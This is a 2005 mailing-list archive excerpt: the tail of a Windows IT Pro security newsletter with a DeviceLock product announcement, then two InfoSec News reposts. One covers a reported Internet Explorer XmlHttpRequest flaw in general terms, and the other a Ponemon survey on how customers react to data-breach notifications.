Ecora Software announced the latest version of its endpoint security solution, Ecora DeviceLock. DeviceLock provides centralized management and access control for USB and FireWire ports, Wi-Fi and Bluetooth adapters, CD-ROM/DVD and floppy drives, and other removable media devices according to user, schedule, and/or specific device. DeviceLock now lets you define a discrete list of administrator accounts so that users with local administrator privileges can't disable or remove DeviceLock services from computers. The product's USB whitelist can now limit access to devices whose serial numbers are on the list. And DeviceLock can now display custom messages when an access attempt is denied. DeviceLock pricing starts at $35 per endpoint. For more information, visit
http://list.windowsitpro.com/t?ctl=14B68:4FB69

Tell Us About a Hot Product and Get a T-Shirt!
Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com.

Editor's note: Share Your Security Discoveries and Get $100
Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length.

====================

==== Sponsored Links ====

Argent Versus MOM 2005
Download Argent Versus Microsoft Operations Manager 2005
http://list.windowsitpro.com/t?ctl=14B4B:4FB69

Is Your Office Truly Fax Integrated?
Download this free whitepaper from Faxback and find out!
http://list.windowsitpro.com/t?ctl=14B53:4FB69

Admins rush to install BLOG servers
How to run your own blog server. Free 5 user license.
http://list.windowsitpro.com/t?ctl=14B66:4FB69

====================

==== Contact Us ====

About the newsletter -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=14B64:4FB69
About product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

====================

This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today.
http://list.windowsitpro.com/t?ctl=14B5A:4FB69

View the Windows IT Pro privacy policy at
http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2005, Penton Media, Inc. All rights reserved.

From isn at c4i.org Thu Sep 29 00:27:33 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 29 00:37:35 2005
Subject: [ISN] Microsoft probes report of IE flaw
Message-ID:

http://beta.news.com.com/Microsoft+probes+report+of+IE+flaw/2100-1002_3-5841381.html

By Joris Evers
Staff Writer, CNET News.com
September 28, 2005

A new flaw in Internet Explorer could be exploited to launch spoof-based attacks, or access and change data on vulnerable PCs, security experts have warned.

The problem lies in the way Microsoft has implemented a JavaScript component in its Web browser, security researcher Amit Klein wrote in a research document. Internet Explorer does not validate some data fields provided by a PC when the component, called XmlHttpRequest, is used, he wrote. The vulnerability could be exploited with specially crafted code.
An attacker could spoof a legitimate Web site, access data from the Web browser's cache or stage a so-called man-in-the-middle attack, which taps into traffic between a user and another Web site, according to Klein's write-up.

Fully patched computers running Windows XP with Service Pack 2 and Internet Explorer 6.0 are vulnerable to this issue, security monitoring company Secunia said in an advisory. Secunia rates the problem as "moderately critical" but says people can avoid the risk by setting the security level in IE to "high."

Microsoft is investigating the vulnerability report, a company representative said in a statement. The software maker is not aware of any attacks that take advantage of the flaw, the representative said. Upon completion of the investigation, Microsoft may provide a security update or emergency fix.

Microsoft is unhappy about the way the problem was disclosed. The company urges security researchers to report problems in its products privately so it can provide a fix. "This public disclosure potentially puts computer users at risk," the Microsoft representative said.

Over the past few weeks, several security researchers have come forward with flaws in Internet Explorer, which is part of Windows. Some of these vulnerabilities could let an intruder gain control of a user's PC. Microsoft initially planned to release at least one patch for Windows earlier this month but pulled it because of quality issues.

Secunia has published 86 security advisories on IE, of which 20 are currently marked "unpatched" in the Secunia database.
From isn at c4i.org Thu Sep 29 00:28:07 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 29 00:37:59 2005
Subject: [ISN] Survey: Security breaches could prove costly to data companies
Message-ID:

http://www.computerworld.com/securitytopics/security/story/0,10801,105015,00.html

By Jaikumar Vijayan
SEPTEMBER 28, 2005
COMPUTERWORLD

Security breaches that compromise confidential customer data could prove far costlier for the companies involved than generally thought.

In a national survey of more than 1,000 victims of personal data security breaches, nearly 20% said they had already terminated their relationships with companies that maintained their data, while another 40% said they might do so. And nearly 5% of those surveyed said they had hired lawyers to seek legal recourse after their data was put at risk.

The numbers highlight growing consumer angst over personal data compromises, said David Bender, co-chair of the privacy practice at White & Case LLC, a New York-based law firm that sponsored the survey. The survey was independently conducted by the Ponemon Institute LLC, a privacy think tank in Tucson, Ariz.

Ponemon's National Survey on Data Security Breach Notifications was completed in August and the results were released on Monday. The survey was conducted to find out how individuals reacted to data security breach notifications. More than 51,000 people were invited to participate in the survey via e-mail, and the results are based on the responses of 1,109 people who said they had been informed of breaches involving a compromise of their personal information.

"It was not surprising that consumers had already terminated or would want to terminate their relationships" after a data breach, Bender said. "What was surprising was the actual percentages. No one expects the consequences will be good [after a data compromise], but few realized just how serious the ramifications can be."
The timeliness, manner and effectiveness with which companies communicate the details of a security breach have a direct impact on the fallout, said Larry Ponemon, founder of the Ponemon Institute. Companies that are straightforward in communicating what they know about a breach, as soon as they have the relevant details, are likely to see far less "consumer churn" than companies that are evasive, he said.

How customers are notified of breaches also appears to be crucial, he said. Standard form letters and e-mails, for instance, are viewed far more skeptically than personalized letters and phone calls, he said. In many cases, data breach notifications that are sent are simply overlooked or discarded as junk mail or spam.

"If a company has a breach and it wants to mitigate the potential costs and loss of customer trust, they should start considering it as an important communication opportunity to prove to the customer that it cares about them," Ponemon said. The fact that nearly 12% of survey respondents said their confidence in a company had actually increased after they were notified of a security breach points to the value of effective communication, he said.

Often the damage from data security breaches goes beyond just scaring customers away. Nearly 58% of respondents to the survey said a breach had decreased their sense of trust and confidence in the organization reporting the incident. Even though consumers may not always immediately end their relationship with a company, a breach can "lessen the relationship" between the two, Ponemon said. Affected consumers, for instance, are likely to be less receptive to new offers and services and are more likely to switch companies when they can. The ability to attract new customers can also be seriously hurt by a data security breach, he said.

As a result, Ponemon said, it is better to incur "large upfront costs" if necessary to properly communicate the scope of a breach.